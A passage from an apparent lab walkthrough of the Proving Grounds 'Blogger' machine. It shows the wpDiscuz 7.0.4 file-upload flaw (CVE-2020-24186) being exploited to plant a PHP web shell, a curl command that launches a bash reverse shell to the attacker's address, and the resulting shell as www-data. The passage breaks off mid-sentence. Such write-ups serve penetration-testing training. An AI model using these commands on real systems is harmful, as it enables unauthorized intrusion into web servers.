Remote Code Execution


The target WordPress instance is vulnerable to CVE-2020-24186: it runs version 7.0.4 of the wpDiscuz plugin, which is affected by the plugin's file-upload bypass and allows an unauthenticated attacker to upload a PHP web shell.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/blogger]
└─$ python3 CVE-2020-24186.py -u http://blogger.pg/assets/fonts/blog -p '?p=27'
---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
--------------------------------------------------------------- 
 
[+] Response length:[60208] | code:[200]
[!] Got wmuSecurity value: 5ec4eb8f32
[!] Got wmuSecurity value: 27 
 
[+] Generating random name for Webshell...
[!] Generated webshell name: pceausvgcjcfcuq
 
[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url":"http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/04/pceausvgcjcfcuq-1745949193.3229.php" 

Running the exploit first harvests the wmuSecurity nonce from post 27 (hence the -p '?p=27' argument) and then uploads a PHP web shell to http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/04/pceausvgcjcfcuq-1745949193.3229.php. The uploaded file is prefixed with a fake GIF header so it passes the plugin's image check, which is why every response from the shell starts with GIF689a;. The shell reads the command to run from the cmd GET parameter.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/blogger]
└─$ cmd=$(echo whoami | urlencode) ; curl -s http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/04/pceausvgcjcfcuq-1745949193.3229.php?cmd=$cmd
GIF689a;
 
www-data
                                                                                                                       

Code execution confirmed: the command runs as www-data, the web server account.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/blogger]
└─$ cmd=$(echo 'bash -c "bash -i >& /dev/tcp/192.168.45.204/9999 0>&1"' | urlencode) ; curl -s http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/04/pceausvgcjcfcuq-1745949193.3229.php?cmd=$cmd

Invoking a reverse shell. The one-liner is wrapped in bash -c because the web shell's system() call executes through /bin/sh, which on Ubuntu is dash and does not support /dev/tcp. The curl request blocks for as long as the reverse shell stays connected, so it prints nothing.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/blogger]
└─$ nnc 9999      
listening on [any] 9999 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.239.217] 35112
bash: cannot set terminal process group (1347): Inappropriate ioctl for device
bash: no job control in this shell
<ress/assets/fonts/blog/wp-content/uploads/2025/04$ whoami
www-data
<ress/assets/fonts/blog/wp-content/uploads/2025/04$ hostname
ubuntu-xenial
<ress/assets/fonts/blog/wp-content/uploads/2025/04$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:46:dc brd ff:ff:ff:ff:ff:ff
    inet 192.168.239.217/24 brd 192.168.239.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe9e:46dc/64 scope link 
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the www-data account by exploiting